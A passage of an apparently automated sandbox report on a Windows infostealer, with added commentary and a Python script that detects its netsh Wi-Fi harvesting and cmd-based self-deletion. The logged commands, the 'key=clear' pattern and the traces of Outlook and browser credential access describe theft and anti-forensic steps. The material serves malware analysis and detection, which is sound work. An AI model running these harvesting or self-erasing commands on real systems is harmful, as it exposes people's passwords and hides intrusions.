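        print("OriginalFilename", repr(n), "differs from on-disk name", disk_name)
```

Run it over a dropped file's bytes or over a process memory dump; several distinct OriginalFilename values in one image, as here, usually mean an embedded payload and are worth more attention than a single renamed binary. Because the scanner does not parse the structure headers, an empty OriginalFilename value is indistinguishable from padding and the next key would be read as the value; a full resource-tree parser (for instance pefile's VS_VERSIONINFO handling) avoids that.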
Source: chormuim.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: chormuimii.exe.0.dr Static PE information: Section: .rsrc ZLIB complexity 0.998019503879
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@39/48@7/5
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 6_2_004019F0
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Virustotal: Detection: 70%
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Metadefender: Detection: 31%
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe ReversingLabs: Detection: 74%
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe "C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\svchoste.exe "C:\Users\user\AppData\Local\Temp\svchoste.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\dll.exe "C:\Users\user\AppData\Local\Temp\dll.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\chormuimii.exe "C:\Users\user\AppData\Local\Temp\chormuimii.exe"
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Process created: C:\Users\user\AppData\Local\Temp\chormuim.exe "C:\Users\user\AppData\Local\Temp\chormuim.exe"
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
Source: unknown Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\svchoste.exe "C:\Users\user\AppData\Local\Temp\svchoste.exe" Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\dll.exe "C:\Users\user\AppData\Local\Temp\dll.exe" Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\chormuimii.exe "C:\Users\user\AppData\Local\Temp\chormuimii.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Process created: C:\Users\user\AppData\Local\Temp\chormuim.exe "C:\Users\user\AppData\Local\Temp\chormuim.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
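Two chains in the process tree above are worth turning into detection logic: a binary in %TEMP% spawning cmd.exe to run netsh wlan show profile / show networks (the Wi-Fi harvesting behind the "Capture Wi-Fi password" Sigma hit), and svchoste.exe spawning cmd.exe /c taskkill /pid <its own pid> & erase <its own path> to remove itself. The Python below is an added example, not code from the report or from any of the malware families it names. It runs both rules over constructed process-creation events in Sysmon Event ID 1 style that mirror the report's lines; the PIDs are assumed except 4648, which the report's own taskkill command names, and the last event is a benign control.

```python
"""Process-tree rules for netsh Wi-Fi recon and cmd-based self-deletion
(added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Constructed events mirroring the report's "Process created" lines.
EVENTS = [
    ProcEvent(4648, 1000, r"C:\Users\user\AppData\Local\Temp\svchoste.exe",
              r'"C:\Users\user\AppData\Local\Temp\svchoste.exe"'),
    ProcEvent(5100, 4648, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase '
              r'C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q '
              r'C:\\ProgramData\\216363876181815\\* & exit'),
    ProcEvent(6504, 3000, r"C:\Users\user\AppData\Local\Temp\chormuim.exe",
              r'"C:\Users\user\AppData\Local\Temp\chormuim.exe"'),
    ProcEvent(6600, 6504, r"C:\Windows\System32\cmd.exe",
              r'"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'),
    ProcEvent(6610, 6600, r"C:\Windows\System32\netsh.exe", "netsh wlan show profile"),
    ProcEvent(6700, 6504, r"C:\Windows\System32\cmd.exe",
              r'"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid'),
    ProcEvent(7000, 1000, r"C:\Windows\System32\cmd.exe", r'"cmd.exe" /C dir'),  # benign control
]

WLAN_RECON = re.compile(r"\bnetsh\b.*\bwlan\b.*\bshow\b.*\b(profiles?|networks)\b", re.I)
KEY_CLEAR = re.compile(r"\bkey\s*=\s*clear\b", re.I)   # the per-profile password dump
SELF_DELETE = re.compile(r"\btaskkill\b.*?/pid\s+(\d+).*?\b(erase|del)\s+(\S+)", re.I)
SHIMS = ("\\cmd.exe", "\\netsh.exe", "\\conhost.exe")   # interpreters to look through


def _origin(e, by_pid):
    """Walk up past cmd/netsh to the process that actually started the chain."""
    while e.image.lower().endswith(SHIMS) and e.ppid in by_pid:
        e = by_pid[e.ppid]
    return e


def user_writable(image):
    """True for images launched from locations a non-admin user can write to."""
    low = image.lower()
    return any(s in low for s in ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\"))


def wifi_recon(events):
    """origin pid -> (origin image, key=clear seen) for every netsh wlan show
    profile/networks invocation, attributed to the nearest non-shim ancestor."""
    by_pid = {e.pid: e for e in events}
    origins = {}
    for e in events:
        if not WLAN_RECON.search(e.cmdline):
            continue
        o = _origin(e, by_pid)
        image, seen_clear = origins.get(o.pid, (o.image, False))
        origins[o.pid] = (image, seen_clear or bool(KEY_CLEAR.search(e.cmdline)))
    return origins


def self_delete(events):
    """(cmd pid, killed pid, erased path) where cmd.exe kills its own parent
    and erases that parent's image: the stealer's cleanup step."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        m = SELF_DELETE.search(e.cmdline)
        if not m:
            continue
        killed, path = int(m.group(1)), m.group(3).strip('"')
        parent = by_pid.get(e.ppid)
        if parent and parent.pid == killed and path.lower() == parent.image.lower():
            hits.append((e.pid, killed, path))
    return hits


def findings(events):
    """Severity-tagged findings; profile enumeration alone from a system path is low."""
    out = []
    for pid, (image, clear) in wifi_recon(events).items():
        sev = "high" if clear or user_writable(image) else "low"
        out.append((sev, "wifi_recon", pid, image))
    for _cmd_pid, killed, path in self_delete(events):
        out.append(("high", "self_delete", killed, path))
    return out


if __name__ == "__main__":
    for f in findings(EVENTS):
        print(*f)
```

The report only shows profile enumeration (show profile | findstr All, show networks mode=bssid), which by itself is also run by admins and support tooling; the rule therefore escalates on the origin being in a user-writable directory or on a follow-up key=clear call, which is the step that actually exposes the passphrase. The self-delete rule deliberately requires the killed PID to be the parent and the erased path to be the parent's own image, so ordinary installers cleaning up temp files do not match.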
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 4648)
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe File created: C:\Users\user\AppData\Local\Temp\svchoste.exe Jump to behavior
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\ProgramData\AMD Driver\taskshell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 6_2_004019F0
Source: dll.exe.0.dr, Forms.cs Base64 encoded string: '[elided]'
Source: 5.2.dll.exe.10000.0.unpack, Forms.cs Base64 encoded string: '[elided]'
Source: 5.0.dll.exe.10000.0.unpack, Forms.cs Base64 encoded string: '[elided]'
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Mutant created: \Sessions\1\BaseNamedObjects\DA31A2B5902E335BCE2AB927B5D26FC7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6504
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Command line argument: 08A 6_2_00413780
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: DotNetZip.dll.8.dr, Ionic/Zip/WinZipAesCipherStream.cs Cryptographic APIs: 'TransformBlock'
Source: DotNetZip.dll.8.dr, Ionic/Zip/WinZipAesCipherStream.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DotNetZip.dll.8.dr, Ionic/Zip/WinZipAesCipherStream.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
